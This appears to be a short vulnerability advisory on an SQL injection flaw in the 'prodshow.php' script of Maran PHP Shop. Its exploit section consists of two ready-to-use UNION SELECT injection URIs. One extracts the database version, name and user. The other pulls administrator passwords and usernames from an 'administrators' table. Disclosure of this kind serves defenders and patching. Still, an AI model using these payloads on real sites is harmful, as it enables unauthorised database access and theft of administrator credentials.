Maran Project Maran PHP Shop 'prodshow.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Maran Project Maran PHP Shop 'prodshow.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/prodshow.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7

http://www.example.com/prodshow.php?id=1 UNION SELECT 1,concat(user_password,char(58),user_name),3,4,5,6,7 FROM administrators